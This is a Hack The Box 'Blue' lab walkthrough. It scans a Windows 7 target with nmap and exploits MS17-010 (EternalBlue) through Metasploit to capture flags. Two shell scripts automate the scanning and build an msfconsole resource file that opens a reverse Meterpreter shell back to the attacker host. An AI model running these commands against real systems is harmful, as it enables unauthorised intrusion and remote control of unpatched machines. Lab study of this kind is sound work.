Hack The Box: Blue Walkthrough

130n@calvinlai.com

Author: 

@18 Dec 2019

Acknowledgement:

This box could not have been completed without the support of our friends at CTF Playgroup Hong Kong & Macau.

Background:

Penetration Methodology:

Service scanning

Enumeration & exploitation

Getting a shell on the target

Capturing the flags

Walkthrough:

Target machine: 10.10.10.40

Attacking (Hacker) machine: 10.10.14.18

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.40. First get a basic picture of the services it exposes: a quick sweep of all TCP ports, followed by an aggressive (-A) nmap scan limited to the ports that came back open.

0.1) Quick pre-scan of all TCP ports

nmap -p- 10.10.10.40

0.2) Detailed analysis of the open ports

nmap -sV -p 135,139,445,49152 -A -oN nmap-htb-blue-detail.txt 10.10.10.40

(-A already implies -sV, so the explicit -sV is redundant but harmless. -oN saves the normal output to a file for later reference.)

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|WAP|phone
Running: iPXE 1.X, Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.10:
|_    Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)
HOP RTT    ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.69 seconds
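The two-phase scan above (sweep every port, then run the expensive -A scan only against what is open) is worth scripting so the port list is never retyped by hand. The following POSIX shell snippet is an added example, not part of the original walkthrough: it parses nmap's normal output for open TCP ports, builds the phase-two command, and flags the "Message signing enabled but not required" result that the host script returned. The scan output embedded in it is a constructed sample modelled on the page's results for 10.10.10.40, and the `htb-blue` file-name label is an assumption.

```shell
#!/bin/sh
# Two-phase nmap workflow: full-port sweep first, then a detailed scan limited
# to the ports the sweep found. Added example, not the page's own tooling.

# Constructed sample of `nmap -p-` normal output (modelled on the page's host).
SAMPLE_SWEEP='Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.10.40
Host is up (0.030s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
49152/tcp open     unknown
49153/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 120.00 seconds'

# Constructed sample of the host-script section of the detailed scan.
SAMPLE_DETAIL='Host script results:
| smb2-security-mode:
|   2.10:
|_    Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)'

# open_ports <nmap-normal-output>
# Prints the open TCP ports as a comma-separated list, in the order nmap
# listed them; filtered/closed ports are skipped.
open_ports() {
    printf '%s\n' "$1" \
      | awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
                 sub(/\/tcp$/, "", $1)
                 p = p (p ? "," : "") $1
             }
             END { print p }'
}

# detail_scan_cmd <target> <ports> <label>
# Builds the phase-two command. -A already includes -sV, so it is not repeated.
detail_scan_cmd() {
    printf 'nmap -A -p %s -oN nmap-%s-detail.txt %s\n' "$2" "$3" "$1"
}

# smb_signing_not_required <nmap-normal-output>
# Exit 0 when nmap reports SMB signing as enabled but not required, i.e. the
# server accepts unsigned sessions (a precondition for SMB relay attacks).
smb_signing_not_required() {
    printf '%s\n' "$1" | grep -q 'Message signing enabled but not required'
}

# run_two_phase <target> <label>: the live workflow (needs nmap on PATH).
run_two_phase() {
    sweep=$(nmap -p- -oN "nmap-$2-sweep.txt" "$1")
    ports=$(open_ports "$sweep")
    [ -n "$ports" ] || { echo "no open TCP ports found" >&2; return 1; }
    detail=$(sh -c "$(detail_scan_cmd "$1" "$ports" "$2")")
    if smb_signing_not_required "$detail"; then
        echo "NOTE: SMB signing not enforced on $1 (relay candidate)" >&2
    fi
}
```

Run it with `run_two_phase 10.10.10.40 htb-blue`; the sweep and detail reports are written to `nmap-htb-blue-sweep.txt` and `nmap-htb-blue-detail.txt`. The signing check matters beyond this box: a host that accepts unsigned SMB sessions can be targeted with NTLM relay, even when no remote code execution bug is present.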

Reading the scan: the OS fingerprint (iPXE / Linux / Sony Ericsson) is noise, as nmap's own warning says, because it had no closed port to compare against. The reliable indicators are the SMB banner on 445 (Windows 7 - 10, workgroup WORKGROUP) and the Service Info line (host HARIS-PC, OS Windows). The host script result "Message signing enabled but not required" also tells us SMB signing is not enforced, which would make the host a candidate for SMB relay if no direct exploit were available.

Enumeration Strategy

  1. Check the Windows 7 host for known vulnerabilities on ports 135, 139 and 445 (RPC and SMB)


Hacking Process Part 1 – Enumeration

1.1) Strategy 1: check for known vulnerabilities

nmap --script vuln -p 135,139,445 10.10.10.40

The vuln script category reported three SMB-related checks:

  1. MS17-010 (EternalBlue, SMBv1 remote code execution; nmap script smb-vuln-ms17-010)
  2. MS10-061 (Print Spooler service impersonation, reached over SMB; smb-vuln-ms10-061)
  3. MS10-054 (SMB server memory corruption; smb-vuln-ms10-054)

Read each script's state rather than just its name: nmap marks a confirmed finding as VULNERABLE, while a script that could not complete its check reports an error or false. MS17-010 is the one pursued below.

Hacking Process Part 2 – Exploitation

2.1) Exploiting MS17-010 over SMB with Metasploit

Search for the MS17-010 modules in msfconsole (search ms17-010).

First attempt: exploit/windows/smb/ms17_010_psexec. This module did not work against this machine. It is a module, not a payload; it relies on reaching a named pipe over SMB, so it is the less reliable choice when SMB access is unauthenticated.

Second attempt: exploit/windows/smb/ms17_010_eternalblue (the machine name, Blue, is a strong hint). This one exploited the host successfully and returned a shell on the Windows target. A caveat for this module: it corrupts kernel memory, so a failed attempt can blue-screen the target; if the first run fails or the session dies, wait for the box to come back and run it again.

Search for the file user.txt and read the key.

Search for the file root.txt and read the key.
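The exploitation steps above can be driven non-interactively with an msfconsole resource script, which also makes it easy to add the MS17-010 scanner module as a check before firing the exploit. The shell snippet below is an added example and is not the author's script: it writes the resource file and lists the Meterpreter commands used to locate the two flags. Module paths and option names are Metasploit's own; the addresses are the ones used on the page; the x64 Meterpreter payload, the listener port 4444 and the `blue.rc` file name are assumptions.

```shell
#!/bin/sh
# Generate a msfconsole resource script for the MS17-010 attack on Blue.
# Added example; module paths are Metasploit's, everything else is assumed.
RHOST=10.10.10.40   # target machine from the walkthrough
LHOST=10.10.14.18   # attacking machine from the walkthrough
LPORT=4444          # assumed reverse-shell listener port

# eternalblue_rc <rhost> <lhost> <lport>
# Prints the resource script: confirm the host is vulnerable with the scanner
# module first, then run ms17_010_eternalblue with a reverse Meterpreter.
eternalblue_rc() {
    cat <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $1
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $1
set payload windows/x64/meterpreter/reverse_tcp
set LHOST $2
set LPORT $3
run
EOF
}

# flag_search_cmds
# Meterpreter commands to type once the session is open: check who we are,
# then locate the flags without guessing user names or paths.
flag_search_cmds() {
    cat <<'EOF'
getuid
search -f user.txt
search -f root.txt
EOF
}

# run_attack: write the resource script and start msfconsole with it.
# Re-run if the first attempt blue-screens the target.
run_attack() {
    eternalblue_rc "$RHOST" "$LHOST" "$LPORT" > blue.rc
    msfconsole -q -r blue.rc
}
```

Source the file and call `run_attack`; the final `run` leaves you inside the Meterpreter session, where the commands from `flag_search_cmds` can be entered and each flag read with `cat` on the path that `search` returns. Running the scanner module first is cheap insurance: it reports whether the host is still vulnerable before a potentially destabilising exploit is attempted.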

Reference Link

Guide to SMB Enumeration

https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/